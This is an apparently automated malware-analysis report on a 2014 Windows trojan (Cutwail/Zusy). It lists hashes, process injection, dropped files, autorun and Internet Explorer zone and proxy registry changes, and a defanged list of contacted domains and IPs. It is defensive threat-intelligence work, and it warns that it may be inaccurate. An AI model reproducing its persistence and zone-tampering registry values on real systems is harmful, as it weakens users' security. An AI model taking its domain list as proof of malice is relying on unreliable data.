Gen.Variant.Zusy.80539_368c6271e7

by malwarelabrobot on April 13th, 2014 in Malware Descriptions.

Trojan.Win32.Cutwail.chu (Kaspersky), Gen:Variant.Zusy.80539 (B) (Emsisoft), Gen:Variant.Zusy.80539 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 368c6271e7c7a0b02a0daa256a2aa283
SHA1: 88c782c4ec6e4456a649d61c863b79a41d57af73
SHA256: 3b9f5ce74cf866baf9a2a209d0ad4b3c25fd85728c0157a2806b011f177dc7b5
SSDeep: 768:4TbKtBVOrAHIR5/fNQuYMqV76ckaZ9Yz2WjEIFoE3AwkV5u9:ZVaz3/fNUVfkarYs 3AwyE9
Size: 48128 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Rapiddown
Created at: 2014-01-16 13:34:07
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1880

The Trojan injects its code into the following process(es):

JRY7B2.tmp:3796
svchost.exe:1876
svchost.exe:2960

File activity

The process %original file name%.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\teknorhino[1].htm (15 bytes)
%Documents and Settings%\%current user%\zygyspypjysl.exe (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (13 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@screaminpeach[1].txt (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigjohnsbeefjerky[1].txt (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\sortedorganizing[1].htm (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@plus[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\JRY7B2.tmp (62 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (881 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@genmar.gen[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@altonhousehotel[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@traderush[1].txt (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@shipeliteexpress[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@stepnet[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\slf6E4C.tmp.bat (123 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10020 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tavdi[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\suspendedpage[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (0 bytes)

The process JRY7B2.tmp:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigtopmultimedia[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sdlp[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\sydney[1].htm (357 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@taykon[1].txt (219 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@istanbultarim.com[1].txt (239 bytes)
%Documents and Settings%\%current user%\sufkywiddeax.exe (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@racknstackwarehouse.com[1].txt (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wsipowerontheweb[1].txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@theautospas[1].txt (230 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@starmedia[1].txt (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (19 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@goodvaluecenter[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@neurotoxininstitute[1].txt (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (197 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cbsprinting.com[1].txt (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\solutioncorp[1].htm (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (28 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@golfpark-moossee[1].txt (281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (20 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@teasing-video[1].txt (233 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@paintball[1].txt (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\authentica-travel[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\403[1].htm (883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\mibsga[1].htm (619 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bigtopmultimedia[1].htm (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@telenavis[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doctsf[1].txt (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (29 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (22728 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@westhillsstl[1].txt (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ctr4process[2].txt (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\audience-web[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\fabianonline[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (0 bytes)

Registry activity

The process %original file name%.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "7A 52 2A 02 D9 25 FC D4 AC 84 5C 34 0C 57 2F 07"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"zygyspypjyslzap" = "B6 8E 66 3E 89 61 39 11 E8 C0 98 70 BB 93 6B 43"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A A8 EB FC 62 9B 3E 7E DE 90 9D EF DE EE 8E 87"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime" = "F5 B1 58 71"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl"

The process JRY7B2.tmp:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 6F 7E 74 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "A8 80 58 30 08 DF B7 8F 67 3F 17 EE C6 9E 76 C1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 86 46 3B DF 0F 73 D7 A8 65 AD B9 5C 26 80 FE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"sufkywiddeaxzap" = "88 60 38 10 E7 BF 97 6F 47 1F F6 CE A6 7E 56 2E"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates]
"E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime"

Dropped PE files

MD5	File path
0a0dcf2f3b12bc676ca93e49b573690d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\JRY7B2.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	602	1024	2.78109	113a7c284fcf4456308de7027b6ee820
.rdata	8192	140	512	0.928075	d2db33f388ee0b37fe18425ddae4394a
.data	12288	127	512	0.496935	3b95829f707498578661cb234d47259d
.rsrc	16384	44608	45056	5.12094	d25dfb3c65a8834eb9e88372fdf29552

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://safetyconnection.ca/	209.222.48.210
hxxp://screaminpeach.com/	162.159.240.165
hxxp://avant-ime.com/	37.148.207.99
hxxp://rueggeberg.com/	81.209.182.37
hxxp://wlf.louisiana.gov/	184.106.119.164
hxxp://slcago.org/	97.74.80.192
hxxp://justconnect.co.za/	5.9.122.172
hxxp://plus.ba/	141.101.117.246
hxxp://victoria.com.pl/	89.161.158.128
hxxp://kvadratoff.ru/	188.93.212.32
hxxp://choice-select.com/	50.56.218.189
hxxp://cgc-england.com/	81.88.57.68
hxxp://y8k6h.x.incapdns.net/
hxxp://miltinio-teatras.lt/	92.61.39.244
hxxp://nuritech.com/	222.239.78.139
hxxp://fabianonline.de/	88.198.7.211
hxxp://empordalia.com/	5.56.61.199
hxxp://padstow.com/	62.233.107.131
hxxp://boundbydesign.com/	97.74.55.128
hxxp://selldoor.pl/	89.161.251.237
hxxp://capitalcitytuxedo.com/	67.223.102.236
hxxp://courtney.ca/	67.223.102.97
hxxp://al-mawared.com/	209.50.248.224
hxxp://robertmcintyre.com.au/	199.73.58.66
hxxp://mattiussiecologia.com/	95.110.203.75
hxxp://biurimex.pl/	89.161.181.123
hxxp://acsmedioambiente.com/	50.97.221.19
hxxp://churchclothes.com/	97.74.42.79
hxxp://combine.or.id/	202.162.33.14
hxxp://mattiussiecologia.com/en/index.aspx
hxxp://tavdi.com/	141.101.117.121
hxxp://genmar.gen.tr/	108.162.196.71
hxxp://hostphd.com.br/	192.196.156.73
hxxp://bigjohnsbeefjerky.com/	162.159.246.113
hxxp://xuanxiao.com/	222.216.190.60
hxxp://eleterno.com/	184.168.233.1
hxxp://saios.net/	157.7.184.19
hxxp://myfilecenter.com/	66.33.213.228
hxxp://www.lucion.com/	174.143.71.146
hxxp://detanses.com/	144.76.86.115
hxxp://fastarchofamerica.com/	75.119.209.232
hxxp://gablemarine.com/	141.101.117.237
hxxp://iaiglobal.or.id/	49.50.8.93
hxxp://churchsupplies.net/	66.232.99.164
hxxp://marcusgrimes.co.uk/	109.74.242.160
hxxp://nanfangcw.com/	119.145.168.16
hxxp://perc.ca/	69.89.31.118
hxxp://shipeliteexpress.com/	108.162.199.142
hxxp://iaiglobal.or.id/v02
hxxp://icigrain.com/	199.91.125.58
hxxp://mandi-man.com/	210.172.144.61
hxxp://sortedorganizing.com/	74.220.199.6
hxxp://geodecisions.com/	216.174.25.93
hxxp://nori-k.com/	210.172.144.24
hxxp://iaiglobal.or.id/v02/
hxxp://audience-web.net/	195.22.26.253
hxxp://etcycles.com/	50.22.150.2
hxxp://d4drmedia.com/	208.70.247.105
hxxp://tvndra.net/	91.216.141.46
hxxp://jeangatz.com/	192.155.94.137
hxxp://altonhousehotel.com/	162.159.250.52
hxxp://stepnet.de/	162.159.246.50
hxxp://christybarry.com/	66.49.139.143
hxxp://austriansurfing.at/	85.13.151.94
hxxp://christybarry.com/cgi-sys/suspendedpage.cgi
hxxp://ctr4process.org/	162.159.242.119
hxxp://rewardhits.com/	66.45.248.130
hxxp://wildrosemarketing.com/	192.99.14.40
hxxp://spiti.org/	217.199.187.58
hxxp://sztartufi.com/	95.110.192.171
hxxp://upsilon89.com/	151.236.48.69
hxxp://berkshirebusiness.org/	64.99.80.30
hxxp://istanbultarim.com.tr/	108.162.199.72
hxxp://brijindia.com/	67.18.185.98
hxxp://gamblingonlinemagazine.com/	198.1.90.242
hxxp://optiver.com.au/	217.195.114.124
hxxp://topex.ro/	193.226.61.45
hxxp://solutioncorp.com/	209.208.32.245
hxxp://www.optiver.com/sydney/	217.195.124.19
hxxp://kaufthal.com/	72.172.133.51
hxxp://acicinvestor.ca/	207.150.203.36
hxxp://fleshercorp.com/	64.111.24.104
hxxp://cbsprinting.com.au/	162.159.250.145
hxxp://vanguardpkg.com/	50.62.115.1
hxxp://midwestga.com/	23.91.121.152
hxxp://aciuba.com.br/	186.249.220.203
hxxp://cksglobal.net/	108.175.147.156
hxxp://184.107.38.38/$
hxxp://mibsga.com/
hxxp://photoclubs.com/	209.50.251.101
hxxp://unslp.edu.bo/	50.28.58.0
hxxp://kagu-hokuren.com/	180.37.186.131
hxxp://d-j-b.net/	210.172.144.247
hxxp://nasz-sklep.pl/	91.192.164.134
hxxp://wsipowerontheweb.com/	108.162.199.18
hxxp://neurotoxininstitute.com/	141.101.113.135
hxxp://theautospas.com/	162.159.254.50
hxxp://taykon.com/	141.101.117.127
hxxp://racknstackwarehouse.com.au/	141.101.116.200
hxxp://easyformations.net/	88.208.216.219
hxxp://sullyfrance.com/	216.8.179.23
hxxp://ryumachi-jp.com/	111.68.174.253
hxxp://mastergrp-spb.ru/	186.2.166.49
hxxp://sdlp.ie/	108.162.199.239
hxxp://goodvaluecenter.com/	162.159.246.190
hxxp://bigtopmultimedia.com/	108.162.198.246
hxxp://sarpy.com/	74.51.217.10
hxxp://rea-soft.ru/	78.47.135.34
hxxp://paintball.be/	213.186.33.19
hxxp://lexjuridica.com/	176.28.103.205
hxxp://cabooseonline.com/	192.138.20.228
hxxp://ezmedi.com/	218.150.78.243
hxxp://automa.it/	95.110.195.52
hxxp://e-kagami.com/	54.249.238.243
hxxp://coopsupermarkt.nl/	213.247.43.95
hxxp://asj.co.jp/	219.118.206.4
hxxp://mastechn.com/	64.207.148.243
hxxp://telenavis.com/	108.162.198.13
hxxp://iktus.fr/	37.187.20.229
hxxp://authentica-travel.com/	98.124.199.1
